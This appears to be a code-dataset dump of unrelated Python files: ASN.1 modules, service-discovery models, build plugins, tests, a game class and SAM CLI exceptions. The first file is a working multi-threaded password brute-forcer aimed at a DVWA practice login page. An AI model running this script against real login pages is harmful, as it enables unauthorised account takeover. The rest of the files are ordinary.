content stringlengths 5 1.05M |
|---|
import requests
import threading
import queue
# Basic parameters for the brute-force run.
user_thread = 10  # number of worker threads to spawn
username = "admin"  # account name to attack
wordlist_file = "pass1000.txt"  # candidate password file, one password per line
target_url = "http://172.16.100.103/dvwa/login.php"  # DVWA login endpoint
# Substring present in the response when login FAILS; its absence signals success.
success_check = "Login failed"
class Bruter(object):
    """Multi-threaded HTTP login brute-forcer for a single username.

    Workers pull candidate passwords from a shared queue and POST them to
    ``target_url`` until a response no longer contains ``success_check``.
    """

    def __init__(self, username, words):
        """
        :param username: account name to try
        :param words: queue.Queue of candidate passwords (bytes, as read from file)
        """
        self.username = username
        self.password_q = words
        self.found = False  # set once any worker hits a successful login
        print("Finished setting up for: %s" % username)

    def run_bruteforce(self):
        """Spawn the worker threads and wait for all of them to finish."""
        workers = []
        for _ in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()
            workers.append(t)
        # Join so the caller only returns once every worker has exited.
        for t in workers:
            t.join()

    def web_bruter(self):
        """Worker loop: try passwords from the queue until one succeeds."""
        while not self.found:
            try:
                # get_nowait() avoids the race between empty() and get():
                # another thread may drain the queue between the two calls.
                brute = self.password_q.get_nowait().rstrip()
            except queue.Empty:
                return
            # BUG FIX: the original posted the hard-coded name 'admin'
            # instead of the username the instance was constructed with.
            post_tags = {'username': self.username, 'password': brute, 'Login': 'Login'}
            print("\b\b" * 100, end="")
            print("\rTrying: %s : %s (%d left)" % (self.username, brute.decode('utf-8'), self.password_q.qsize()), end="")
            login_response = requests.post(target_url, data=post_tags)
            if success_check not in login_response.text:
                self.found = True
                print("\n[*] Bruteforce successful.")
                print("[*] Username: %s" % self.username)
                print("[*] Password: %s" % brute.decode('utf-8'))
                print("[*] Waiting for other threads to exit...")
def build_wordlist(wordlist_file):
    """Read a wordlist file and return its entries in a queue.

    Each line is stripped of trailing whitespace/newlines and enqueued as
    bytes (the file is opened in binary mode, matching the workers, which
    call ``.decode('utf-8')`` on each candidate).

    :param wordlist_file: path to a file with one candidate password per line
    :return: queue.Queue of bytes passwords, in file order
    """
    words = queue.Queue()
    # Context manager guarantees the file handle is closed even on error;
    # iterating the handle avoids loading the whole file via readlines().
    with open(wordlist_file, "rb") as fd:
        for word in fd:
            words.put(word.rstrip())
    return words
# Script entry: build the password queue, then brute-force the target.
# (Stray trailing artifact removed from the final line.)
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()
#
# This file is part of pyasn1-alt-modules software.
#
# Created by Russ Housley with assistance from asn1ate v.0.6.0.
# Modified by Russ Housley to include the opentypemap manager.
#
# Copyright (c) 2019-2021, Vigil Security, LLC
# License: http://vigilsec.com/pyasn1-alt-modules-license.txt
#
# The scrypt Password-Based Key Derivation Function
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc7914.txt
# https://www.rfc-editor.org/errata/eid5871
#
from pyasn1.type import constraint
from pyasn1.type import namedtype
from pyasn1.type import univ
from pyasn1_alt_modules import opentypemap
# Shared opentype map (algorithm OID -> parameters type) used across pyasn1-alt-modules.
algorithmIdentifierMap = opentypemap.get('algorithmIdentifierMap')

# Upper bound for the "(1..MAX)" ASN.1 value-range constraints below.
MAX = float('inf')

# Algorithm identifier and parameters for the
# scrypt Password-Based Key Derivation Function
id_scrypt = univ.ObjectIdentifier('1.3.6.1.4.1.11591.4.11')
class Scrypt_params(univ.Sequence):
    """scrypt-params SEQUENCE: salt, cost (N), block size (r),
    parallelization (p), and an optional derived key length.
    All integer components are constrained to (1..MAX)."""

    componentType = namedtype.NamedTypes(
        namedtype.NamedType('salt', univ.OctetString()),
        namedtype.NamedType('costParameter', univ.Integer().subtype(
            subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
        namedtype.NamedType('blockSize', univ.Integer().subtype(
            subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
        namedtype.NamedType('parallelizationParameter', univ.Integer().subtype(
            subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
        namedtype.OptionalNamedType('keyLength', univ.Integer().subtype(
            subtypeSpec=constraint.ValueRangeConstraint(1, MAX))),
    )
# Update the Algorithm Identifier Map and the S/MIME Capability Map
# Update the Algorithm Identifier Map so generic AlgorithmIdentifier
# decoders can resolve scrypt parameters by OID.
_algorithmIdentifierMapUpdate = {
    id_scrypt: Scrypt_params(),
}

algorithmIdentifierMap.update(_algorithmIdentifierMapUpdate)
|
# Copyright 2022. Tushar Naik
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from enum import Enum
from common.helper import safe_get
"""
includes all models required for the service provider
"""
class HealthcheckStatus(Enum):
    """Health state reported for a service node."""
    HEALTHY = "healthy"
    UNHEALTHY = "unhealthy"
class UrlScheme(Enum):
    """Request scheme selector.

    NOTE(review): despite the name, the members are HTTP methods rather than
    URL schemes — confirm intended usage with callers before renaming.
    """
    GET = 1
    POST = 2
class NodeData(object):
    """Optional metadata (environment, region, tags) attached to a service node."""

    def __init__(self, environment, region, tags):
        self.environment = environment
        self.region = region
        self.tags = tags

    @staticmethod
    def _is_none(val):
        # Treat both None and an empty collection/string as "absent".
        return val is None or len(val) == 0

    def to_dict(self):
        """Serialize to a dict; an entirely empty node collapses to {}."""
        has_data = (self.environment is not None
                    or self.region is not None
                    or not self._is_none(self.tags))
        if not has_data:
            return {}
        return {
            "environment": self.environment,
            "region": self.region,
            "tags": self.tags,
        }
class ServiceNode(object):
    """
    Represents a service that may be discoverable at a host:port over your
    favourite transport protocol.
    """

    def __init__(self,
                 host: str,
                 port: int,
                 node_data: NodeData,
                 healthcheck_status: HealthcheckStatus,
                 last_updated_timestamp: int):
        self.host = host
        self.port = port
        self.node_data = node_data  # may legitimately be None (see create())
        self.last_updated_timestamp = last_updated_timestamp
        self.healthcheck_status = healthcheck_status

    @classmethod
    def create(cls, bytes):
        """
        use this factory method to create the ServiceNode from json serialized bytes
        :param bytes: json (parameter name kept for backward compatibility,
            although it shadows the builtin)
        :return: ServiceNode
        """
        node_data_json = json.loads(bytes)
        node_data = None
        if 'nodeData' in node_data_json:
            node_data = NodeData(environment=safe_get(node_data_json['nodeData'], 'environment'),
                                 region=safe_get(node_data_json['nodeData'], 'region'),
                                 tags=safe_get(node_data_json['nodeData'], 'tags'))
        # Select the enum member directly; the original redundantly wrapped a
        # member in the enum constructor (HealthcheckStatus(HealthcheckStatus.HEALTHY)).
        status = (HealthcheckStatus.HEALTHY
                  if safe_get(node_data_json, 'healthcheckStatus') == 'healthy'
                  else HealthcheckStatus.UNHEALTHY)
        return cls(host=node_data_json['host'],
                   port=int(node_data_json['port']),
                   node_data=node_data,
                   healthcheck_status=status,
                   last_updated_timestamp=int(node_data_json['lastUpdatedTimeStamp']))

    def to_dict(self):
        """Serialize for registration; tolerates node_data being None."""
        # BUG FIX: the original called self.node_data.to_dict() unconditionally
        # and raised AttributeError for nodes created without a 'nodeData' key.
        node_data_dict = self.node_data.to_dict() if self.node_data is not None else {}
        return {"host": self.host, "port": self.port, "nodeData": node_data_dict,
                "healthcheckStatus": self.healthcheck_status.value,
                "lastUpdatedTimeStamp": self.last_updated_timestamp}

    def get_host(self):
        """
        :return: hostname
        """
        return self.host

    def get_host_port(self):
        """
        :return: host port pair
        """
        return self.host, self.port

    def get_endpoint(self, secure=False):
        """
        :param secure: if the scheme to be used is secure
        :return: endpoint URL
        """
        scheme = "https" if secure else "http"
        return f"{scheme}://{self.host}:{self.port}"

    def get_port(self):
        """
        :return: port
        """
        return self.port

    def get_node_data(self):
        """
        :return: node data (NodeData or None)
        """
        return self.node_data
class ServiceDetails(object):
    """Identity of a service registration: its location and registry paths."""

    def __init__(self, host, port, environment, namespace, service_name, region=None, tags=None):
        self.host = host
        self.port = port
        self.namespace = namespace
        self.service_name = service_name
        self.environment = environment
        self.region = region
        self.tags = tags

    def get_path(self):
        """Registry path for this specific host:port registration."""
        return f"/{self.namespace}/{self.service_name}/{self.host}:{self.port}"

    def get_root_path(self):
        """Registry path shared by every node of the service."""
        return f"/{self.namespace}/{self.service_name}"

    def to_dict(self):
        # region and tags are intentionally not part of the serialized form.
        return {
            "host": self.host,
            "port": self.port,
            "environment": self.environment,
            "namespace": self.namespace,
            "service": self.service_name,
        }
class ClusterDetails(object):
    """Connection settings for the discovery cluster."""

    def __init__(self, zk_string, update_interval_in_secs=1):
        # Coerce to str so callers may pass any stringifiable object.
        self.zk_string = str(zk_string)
        self.update_interval_in_secs = update_interval_in_secs

    def to_dict(self):
        return {
            "zk_string": self.zk_string,
            "update_interval_in_secs": self.update_interval_in_secs,
        }
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.python.target_types import COMMON_PYTHON_FIELDS, PythonSources
from pants.engine.target import Dependencies, Target
class PylintPluginSources(PythonSources):
    # Plugin targets must always declare sources; `required` enforces that.
    required = True
# NB: We solely subclass this to change the docstring.
class PylintPluginDependencies(Dependencies):
    """Addresses to other targets that this plugin depends on.

    Due to restrictions with Pylint plugins, these targets must either be third-party Python
    dependencies (https://www.pantsbuild.org/docs/python-third-party-dependencies) or be located
    within this target's same directory or a subdirectory.
    """
class PylintSourcePlugin(Target):
    """A Pylint plugin loaded through source code.

    To load a source plugin:

    1. Write your plugin. See http://pylint.pycqa.org/en/latest/how_tos/plugins.html.
    2. Define a `pylint_source_plugin` target with the plugin's Python file(s) included in the
       `sources` field.
    3. Add the parent directory of your target to the `root_patterns` option in the `[source]`
       scope. For example, if your plugin is at `build-support/pylint/custom_plugin.py`, add
       'build-support/pylint'. This is necessary for Pants to know how to tell Pylint to
       discover your plugin. See https://www.pantsbuild.org/docs/source-roots.
    4. Add `load-plugins=$module_name` to your Pylint config file. For example, if your Python
       file is called `custom_plugin.py`, set `load-plugins=custom_plugin`. Set the `config`
       option in the `[pylint]` scope to point to your Pylint config file.
    5. Set the option `source_plugins` in the `[pylint]` scope to include this target's
       address, e.g. `source_plugins = ["build-support/pylint:plugin"]`.

    To instead load a third-party plugin, set the option `extra_requirements` in the `[pylint]`
    scope (see https://www.pantsbuild.org/docs/python-linters-and-formatters). Set `load-plugins` in
    your config file, like you'd do with a source plugin.

    This target type is treated similarly to a `python_library` target. For example, Python linters
    and formatters will run on this target.

    You can include other targets in the `dependencies` field, so long as those targets are
    third-party dependencies or are located in the same directory or a subdirectory.

    Other targets can depend on this target. This allows you to write a `python_tests` target for
    this code or a `python_distribution` target to distribute the plugin externally.
    """

    # Name used to declare this target type in BUILD files.
    alias = "pylint_source_plugin"
    # Standard Python fields plus the plugin-specific dependencies/sources above.
    core_fields = (*COMMON_PYTHON_FIELDS, PylintPluginDependencies, PylintPluginSources)
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import pytest
import requests
import responses
from airbyte_cdk.sources.streams.http.auth import NoAuth
from source_us_census.source import UsCensusStream
@pytest.fixture
def us_census_stream():
    """Stream instance wired with dummy credentials for offline testing."""
    return UsCensusStream(
        query_params={},
        query_path="data/test",
        api_key="MY_API_KEY",
        authenticator=NoAuth(),
    )
# Minimal Census-style payload: the first row is the header, the rest are records.
simple_test = '[["name","id"],["A","1"],["B","2"]]'

# Larger sample payload in the same header-then-rows format.
example_from_docs_test = (
    '[["STNAME","POP","DATE_","state"],'
    '["Alabama","4849377","7","01"],'
    '["Alaska","736732","7","02"],'
    '["Arizona","6731484","7","04"],'
    '["Arkansas","2966369","7","05"],'
    '["California","38802500","7","06"]]'
)
@responses.activate
@pytest.mark.parametrize(
    "response, expected_result",
    [
        (
            simple_test,
            [{"name": "A", "id": "1"}, {"name": "B", "id": "2"}],
        ),
        # Redundant extra parentheses around this case removed.
        (
            example_from_docs_test,
            [
                {"STNAME": "Alabama", "POP": "4849377", "DATE_": "7", "state": "01"},
                {"STNAME": "Alaska", "POP": "736732", "DATE_": "7", "state": "02"},
                {"STNAME": "Arizona", "POP": "6731484", "DATE_": "7", "state": "04"},
                {"STNAME": "Arkansas", "POP": "2966369", "DATE_": "7", "state": "05"},
                {"STNAME": "California", "POP": "38802500", "DATE_": "7", "state": "06"},
            ],
        ),
        (
            '[["name","id"],["I have an escaped \\" quote","I have an embedded , comma"],["B","2"]]',
            [
                {
                    "name": 'I have an escaped " quote',
                    "id": "I have an embedded , comma",
                },
                {"name": "B", "id": "2"},
            ],
        ),
    ],
)
def test_parse_response(us_census_stream: UsCensusStream, response: str, expected_result: list):
    """parse_response should zip the header row onto each record row.

    (Annotation fixed: expected_result is a list of dicts, not a dict.)
    """
    responses.add(
        responses.GET,
        us_census_stream.url_base,
        body=response,
    )
    resp = requests.get(us_census_stream.url_base)
    assert list(us_census_stream.parse_response(resp)) == expected_result
type_string = {"type": "string"}
@responses.activate
@pytest.mark.parametrize(
    "response, expected_schema",
    [
        (simple_test, {"name": type_string, "id": type_string}),
        (
            example_from_docs_test,
            {"STNAME": type_string, "POP": type_string, "DATE_": type_string, "state": type_string},
        ),
    ],
)
def test_discover_schema(us_census_stream: UsCensusStream, response: str, expected_schema: dict):
    """Every column in the response should be discovered as a string property."""
    schema_url = f"{us_census_stream.url_base}{us_census_stream.query_path}"
    responses.add(responses.GET, schema_url, body=response)
    discovered = us_census_stream.get_json_schema().get("properties")
    assert discovered == expected_schema
|
#!/usr/bin/env python3
import logging
import argparse
from version.VersiON import VersiON
import version.git_help
def main(args):
    """Compute and print the next version for the repository state at args.sha1."""
    logger = logging.getLogger(__file__)

    versi_on = VersiON(args.style_name, args.config)
    if args.name is not None:
        versi_on.style.set_variable('{component_name}', args.name)
    logger.info(f"Picked versioning style: {args.style_name}")

    git = version.git_help.GitHelp()
    previous_release_tag = git.get_previous_release_tag(args.sha1, versi_on.style.config['regex'])

    # A previous release that does not match the chosen style is a hard error.
    if previous_release_tag is not None and not versi_on.match_style(previous_release_tag):
        current_pattern = versi_on.style.config['pattern']
        raise Exception(
            f"Different version style. Previous release:{previous_release_tag} and currently picked:{current_pattern}")

    commits_to_release_messages = git.get_commits(args.sha1, previous_release_tag)
    if not commits_to_release_messages:
        # No commits since the previous release: re-print the existing tag.
        logger.info("Nothing to release")
        print(previous_release_tag)
        return

    release_name = versi_on.bump_version(previous_release_tag, commits_to_release_messages)
    if args.enable_mark_wip:
        logger.info("New version (WIP):")
        print(
            f"{release_name}{versi_on.config['DEFAULT']['work_in_progress_sufix']}")
    else:
        logger.info("New version:")
        print(release_name)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--config", help="Config file path, if not specified then default used. Check config/")
parser.add_argument(
"--style-name", help="Example: revision, semantic", required=True)
parser.add_argument(
"--name", help="Example: MyApp")
parser.add_argument(
"--enable-mark-wip", help="add sufix to VERSION when version isn't released. Sufix is set in config file",
action="store_true")
parser.add_argument(
"--verbose", help="", action="store_true")
parser.add_argument(
"--sha1", help="you can specify which commit to treat as HEAD", default="HEAD")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.ERROR)
main(args)
exit(0)
|
# -*- coding: utf-8 -*-
"""WSGI entry point: builds the genotype Flask app from environment-driven config."""
import os
from genotype.server.app import create_app

# App configuration assembled from the process environment.
# NOTE(review): the os.environ[...] lookups raise KeyError at import time when
# unset, while GENOTYPE_GENOTYPE_DIR uses .get() and may be None — confirm intended.
config = {
    "GENOTYPE_INCLUDE_KEY": "-CG-",
    "GENOTYPE_GENOTYPE_DIR": os.environ.get("GENOTYPE_GENOTYPE_DIR"),
    "GENOTYPE_MAX_NOCALLS": 15,
    "GENOTYPE_MAX_MISMATCH": 3,
    "GENOTYPE_MIN_MATCHES": 35,
    "SQLALCHEMY_DATABASE_URI": os.environ["SQLALCHEMY_DATABASE_URI"],
    "SQLALCHEMY_TRACK_MODIFICATIONS": False,
    # user management
    "GOOGLE_OAUTH_CLIENT_ID": os.environ["GOOGLE_OAUTH_CLIENT_ID"],
    "GOOGLE_OAUTH_CLIENT_SECRET": os.environ["GOOGLE_OAUTH_CLIENT_SECRET"],
}

# The module-level WSGI callable that servers look up by convention.
application = create_app(config_obj=config)
|
"""Traceability"""
__version__ = '0.1.dev'
__license__ = 'BSD License'
__author__ = 'Joost VanDorp'
__email__ = 'joostvandorp@gmail.com'
__url__ = 'https://github.com/vandorjw/django-traceability'
|
from basepokemon import BasePokemon, BaseMove, Type
class Pokemon(BasePokemon):
    """Water-type pokemon that cycles through its four moves in a fixed order."""

    def __init__(self):
        BasePokemon.__init__(self)
        # Stat points have to sum to 100.
        self.spend_hp(30)
        self.spend_attack(50)
        self.spend_defence(20)
        for move in (Escupitajo_nuclear(), Agua_contaminada(), Mirada_tierna(), Patada_pequena()):
            self.add_move(move)
        self.set_type(Type.WATER)
        # Index of the next move in the rotation; wraps around `self.moves`.
        self.move = 0
        self.moves = ['Escupitajo nuclear', "Chorro de agua contaminada", "Mirada tierna", "Patada pequeña"]

    def get_name(self):
        return "Axolotin"

    def choose_move(self, enemy):
        """Return the next move in the rotation (the enemy is ignored)."""
        chosen = self.moves[self.move]
        self.move = (self.move + 1) % len(self.moves)
        return self.get_move_by_name(chosen)
class Escupitajo_nuclear(BaseMove):
    """Water-type move: "Escupitajo nuclear" (nuclear spit)."""

    def __init__(self):
        BaseMove.__init__(self)
        self.choose_uses(1)
        self.set_type(Type.WATER)

    def get_name(self):
        return "Escupitajo nuclear"
class Agua_contaminada(BaseMove):
    """Water-type move: "Chorro de agua contaminada" (contaminated water jet)."""

    def __init__(self):
        BaseMove.__init__(self)
        self.choose_uses(1)
        self.set_type(Type.WATER)

    def get_name(self):
        return "Chorro de agua contaminada"
class Mirada_tierna(BaseMove):
    """Normal-type move: "Mirada tierna" (tender look)."""

    def __init__(self):
        BaseMove.__init__(self)
        self.choose_uses(1)
        self.set_type(Type.NORMAL)

    def get_name(self):
        return "Mirada tierna"
class Patada_pequena(BaseMove):
    """Normal-type move: "Patada pequeña" (little kick)."""

    def __init__(self):
        BaseMove.__init__(self)
        self.choose_uses(1)
        self.set_type(Type.NORMAL)

    def get_name(self):
        return "Patada pequeña"
|
"""
Exceptions that are raised by sam package
"""
from samcli.commands.exceptions import UserException
class InvalidLocalPathError(UserException):
    """Raised when a resource property references a nonexistent local file/folder."""

    def __init__(self, resource_id, property_name, local_path):
        self.resource_id = resource_id
        self.property_name = property_name
        self.local_path = local_path
        message = (
            f"Parameter {property_name} of resource {resource_id} refers "
            f"to a file or folder that does not exist {local_path}"
        )
        super().__init__(message=message)
class InvalidTemplateUrlParameterError(UserException):
    """Raised when a TemplateURL-style property is neither an S3 URL nor a template path."""

    def __init__(self, resource_id, property_name, template_path):
        self.resource_id = resource_id
        self.property_name = property_name
        self.template_path = template_path
        message = (
            f"{property_name} parameter of {resource_id} resource is invalid. "
            "It must be a S3 URL or path to CloudFormation "
            f"template file. Actual: {template_path}"
        )
        super().__init__(message=message)
class ExportFailedError(UserException):
    """Raised when an artifact referenced by a resource property cannot be uploaded."""

    def __init__(self, resource_id, property_name, property_value, ex):
        self.resource_id = resource_id
        self.property_name = property_name
        self.property_value = property_value
        self.ex = ex
        message = (
            f"Unable to upload artifact {property_value} referenced "
            f"by {property_name} parameter of {resource_id} resource."
            f"\n{ex}"
        )
        super().__init__(message=message)
class ImageNotFoundError(UserException):
    """Raised when a container image referenced by a resource cannot be found."""

    def __init__(self, resource_id, property_name):
        self.resource_id = resource_id
        self.property_name = property_name
        message = f"Image not found for {property_name} parameter of {resource_id} resource. \n"
        super().__init__(message=message)
class ECRAuthorizationError(UserException):
    """Raised with a caller-supplied message when ECR authorization fails."""

    def __init__(self, msg):
        self.msg = msg
        super().__init__(message=self.msg)
class DockerLoginFailedError(UserException):
    """Raised with a caller-supplied message when `docker login` fails."""

    def __init__(self, msg):
        self.msg = msg
        super().__init__(message=self.msg)
class DockerPushFailedError(UserException):
    """Raised with a caller-supplied message when `docker push` fails."""

    def __init__(self, msg):
        self.msg = msg
        super().__init__(message=self.msg)
class DockerGetLocalImageFailedError(UserException):
    """Raised with a caller-supplied message when a local Docker image cannot be retrieved."""

    def __init__(self, msg):
        self.msg = msg
        super().__init__(message=self.msg)
class PackageFailedError(UserException):
    """Raised when packaging a template fails, wrapping the underlying error."""

    def __init__(self, template_file, ex):
        self.template_file = template_file
        self.ex = ex
        super().__init__(message=f"Failed to package template: {template_file}. \n {ex}")
class NoSuchBucketError(UserException):
    """Raised when the configured S3 bucket does not exist."""

    def __init__(self, **kwargs):
        # kwargs kept for backward compatibility; the message has no placeholders,
        # so .format(**kwargs) on it was a no-op.
        self.kwargs = kwargs
        super().__init__(message="\nS3 Bucket does not exist.")
class BucketNotSpecifiedError(UserException):
    """Raised when no S3 bucket was provided for the operation."""

    def __init__(self, **kwargs):
        # kwargs kept for backward compatibility; the message has no placeholders,
        # so .format(**kwargs) on it was a no-op.
        self.kwargs = kwargs
        super().__init__(message="\nS3 Bucket not specified, use --s3-bucket to specify a bucket name or run sam deploy --guided")
class PackageResolveS3AndS3SetError(UserException):
    """Raised when --resolve-s3 and --s3-bucket are both supplied (mutually exclusive)."""

    def __init__(self):
        message_fmt = "Cannot use both --resolve-s3 and --s3-bucket parameters. Please use only one."
        super().__init__(message=message_fmt)
class PackageResolveS3AndS3NotSetError(UserException):
    """Raised when neither --resolve-s3 nor --s3-bucket is supplied (one is required)."""

    def __init__(self):
        message_fmt = "Cannot skip both --resolve-s3 and --s3-bucket parameters. Please provide one of these arguments."
        super().__init__(message=message_fmt)
|
# Copyright (c) 2016, Samantha Marshall (http://pewpewthespells.com)
# All rights reserved.
#
# https://github.com/samdmarshall/pyconfig
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of Samantha Marshall nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import string
import itertools
import unittest
import pyconfig
import pyconfig.Deserializer.xcconfig
test_directory = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'tests')
def LoadTestDirectoryAndTestWithName(test, test_pyconfig_path_sub, test_file_name, additional_flags=None, override=False):
    """Run pyconfig over a fixture directory and diff generated vs expected xcconfig.

    :param test: the unittest.TestCase issuing the assertions
    :param test_pyconfig_path_sub: sub-path under the tests directory
    :param test_file_name: base name (without extension) of the generated file
    :param additional_flags: extra CLI flags appended to the pyconfig invocation
    :param override: when True, do not pass the fixture directory path itself
    """
    # BUG FIX (latent): the original used a mutable default argument ([]),
    # which is shared across calls; use None and build a fresh list instead.
    if additional_flags is None:
        additional_flags = []
    test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
    test_generated_output = os.path.join(test_pyconfig_path, test_file_name + '.xcconfig')
    test_expected_output = os.path.join(test_pyconfig_path, test_file_name + '_output.xcconfig')
    args = ['--quiet']
    if not override:
        args.append(test_pyconfig_path)
    args.extend(additional_flags)
    pyconfig.main(args)
    generated_output = pyconfig.Deserializer.xcconfig.xcconfig(test_generated_output)
    expected_output = pyconfig.Deserializer.xcconfig.xcconfig(test_expected_output)
    # Compare line counts first for a clearer failure, then line-by-line.
    # (The redundant list() around zip() was dropped.)
    test.assertEqual(len(generated_output.lines), len(expected_output.lines))
    for generated, expected in zip(generated_output.lines, expected_output.lines):
        test.assertEqual(generated, expected)
class pyconfigTestCases(unittest.TestCase):
    """End-to-end fixture tests: each case runs pyconfig over a directory under
    tests/ and compares the generated xcconfig against a stored expected file."""

    def test_comments(self):
        LoadTestDirectoryAndTestWithName(self, 'comments', 'test')

    def test_conditionals(self):
        LoadTestDirectoryAndTestWithName(self, 'conditionals', 'test')

    def test_direct_assignment_specific(self):
        LoadTestDirectoryAndTestWithName(self, 'direct assignment/specific', 'test')

    def test_direct_assignment_automatic(self):
        LoadTestDirectoryAndTestWithName(self, 'direct assignment/automatic', 'test')

    def test_export_with_keyword(self):
        LoadTestDirectoryAndTestWithName(self, 'export/with-export', 'defaults')

    def test_export_with_keyword_and_include(self):
        LoadTestDirectoryAndTestWithName(self, 'export/with-export-and-include', 'defaults')

    def test_export_without_keyword(self):
        LoadTestDirectoryAndTestWithName(self, 'export/without-export', 'test')

    def test_include_optional(self):
        LoadTestDirectoryAndTestWithName(self, 'include/optional', 'test')

    def test_include_required(self):
        LoadTestDirectoryAndTestWithName(self, 'include/required', 'test')

    def test_include_legacy(self):
        LoadTestDirectoryAndTestWithName(self, 'include/legacy', 'test')

    def test_include_missing_required(self):
        LoadTestDirectoryAndTestWithName(self, 'include/missing required', 'test')

    def test_inherits(self):
        LoadTestDirectoryAndTestWithName(self, 'inherits', 'test')

    def test_variable_substitution_with_use(self):
        LoadTestDirectoryAndTestWithName(self, 'variable substitution/with-use', 'test')

    def test_variable_substitution_without_use(self):
        LoadTestDirectoryAndTestWithName(self, 'variable substitution/without-use', 'test')

    def test_search_direct_file(self):
        # Pass an explicit file path (override=True skips the directory arg).
        test_pyconfig_path_sub = 'search/direct-file'
        test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
        direct_file_path = os.path.join(test_pyconfig_path, 'test.pyconfig')
        LoadTestDirectoryAndTestWithName(self, test_pyconfig_path_sub, 'test', [direct_file_path], True)

    def test_search_directory_path(self):
        test_pyconfig_path_sub = 'search/directory'
        test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
        LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test-dir/test', [test_pyconfig_path], True)

    def test_duplicate_definition_single_file(self):
        LoadTestDirectoryAndTestWithName(self, 'duplicate definitions/single file', 'test')

    def test_duplicate_definition_multiple_files(self):
        test_pyconfig_path_sub = 'duplicate definitions/multiple files'
        test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
        LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test', [test_pyconfig_path], True)

    def test_flags_scheme_name(self):
        LoadTestDirectoryAndTestWithName(self, 'flags/scheme name', 'test', ['--scheme', 'MyAppDebug'])

    def test_scm_info_git(self):
        LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/git', 'test', ['--scm-info=git'])

    def test_scm_info_svn(self):
        LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/svn', 'test', ['--scm-info=svn'])

    def test_scm_info_hg(self):
        LoadTestDirectoryAndTestWithName(self, 'flags/scm-info/hg', 'test', ['--scm-info=hg'])

    def test_scm_info_detect(self):
        # 'detect' mode should resolve to git for a git fixture directory.
        test_pyconfig_path_sub = 'flags/scm-info/git'
        test_pyconfig_path = os.path.join(test_directory, test_pyconfig_path_sub)
        direct_file_path = os.path.join(test_pyconfig_path, 'test.pyconfig')
        LoadTestDirectoryAndTestWithName(self, test_pyconfig_path, 'test', ['--scm-info=detect', direct_file_path], True)

    def test_debug_flag(self):
        LoadTestDirectoryAndTestWithName(self, 'comments', 'test', ['--verbose', '--debug'])
if __name__ == '__main__':
    # Allow running this test module directly. (Stray trailing artifact removed.)
    unittest.main()
import os # noqa
from argparse import ArgumentParser, Namespace
from math import ceil
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from ignite.contrib.handlers import WandBLogger
